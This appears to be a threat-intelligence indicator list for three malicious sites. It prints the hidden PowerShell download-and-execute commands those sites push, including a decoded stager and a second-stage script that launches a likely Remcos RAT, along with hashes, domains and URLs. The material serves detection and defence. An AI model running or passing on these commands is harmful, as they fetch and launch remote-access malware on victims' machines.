1] https[:]//human-bot-view[.]chalnlizt[.]org: [+] PowerShell Command: PowerShell.exe -eC cABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwAgAEgAaQBkAGQAZQBuACAALQBjACAAIgBpAGUAeAAgACgAaQB3AHIAIABoAHQAdABwAHMAOgAvAC8AYgBjAC4AYQB4AC8AMgA1AFcAZQBMADQAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACkALgBDAG8AbgB0AGUAbgB0ACIA [+] PowerShell Decoded Command: PowerShell -W Hidden -c "iex (iwr https[:]//bc[.]ax/25WeL4 -UseBasicParsing).Content" [+]2nd stage URL: - https[:]//bc[.]ax/25WeL4 (Below is content of the URL) $webClient = New-Object System.Net.WebClient $url1 = "https[:]//challinksch[.]com/docpzip[.]zip" $zipPath1 = "$env:TEMP\mfiles.zip" $webClient.DownloadFile($url1, $zipPath1) $extractPath1 = "$env:TEMP\mfile" Expand-Archive -Path $zipPath1 -DestinationPath $extractPath1 Start-Process -FilePath $env:TEMP\mfile\ixploren.exe [+] IOCs [-] SHA-256: 4dfd03f81e75f12e8fd5ab2a4cbddc7ee9c695ff271390bad05538e04597b811 - docpzip.zip 08c7fb6067acc8ac207d28ab616c9ea5bc0d394956455d6a3eecb73f8010f7a2 - ixploren.exe (Highly Possible Remcos RAT) a6846a51472a6a42a4f2d4cfb4a79980ebe6b01b80da4ac4ca4a5c3fb022be1e - msimg32.dll (Suspicious DLL) [-] Domains: human-bot-view[.]chalnlizt[.]org challinksch[.]com bc[.]ax [-] URLs: https[:]//human-bot-view[.]chalnlizt[.]org https[:]//challinksch[.]com/docpzip[.]zip https[:]//bc[.]ax/25WeL4 2] https[:]//challinksch[.]com: [+] PowerShell Command: PowerShell -Command "(New-Object Net.WebClient).DownloadFile('https[:]//the[.]earth[.]li/~sgtatham/putty/latest/w64/putty[.]exe', $env:TEMP + '\CaptionBot.exe'); Start-Process $env:TEMP'\CaptionBot.exe'" [+] IOC's [-] Domain: challinksch[.]com [-] URL: https[:]//challinksch[.]com 3] https[:]//generete-nav-correios[.]space-to-rent[.]com: [+] PowerShell Command: PowerShell -W Hidden -Command "Invoke-WebRequest -Uri 'http[:]//ec2-15-228-128-188[.]sa-east-1[.]compute[.]amazonaws[.]com/modecorreiosrastreio[.]msi' -OutFile $env:TEMP\modecorreiosrastreio.msi; Start-Process $env:TEMP\modecorreiosrastreio.msi" [+] IOC's [-] Domains: ec2-15-228-128-188[.]sa-east-1[.]compute[.]amazonaws[.]com [-] IP: 15[.]228[.]128[.]188 [-] URL: http[:]//ec2-15-228-128-188[.]sa-east-1[.]compute[.]amazonaws[.]com/modecorreiosrastreio[.]msi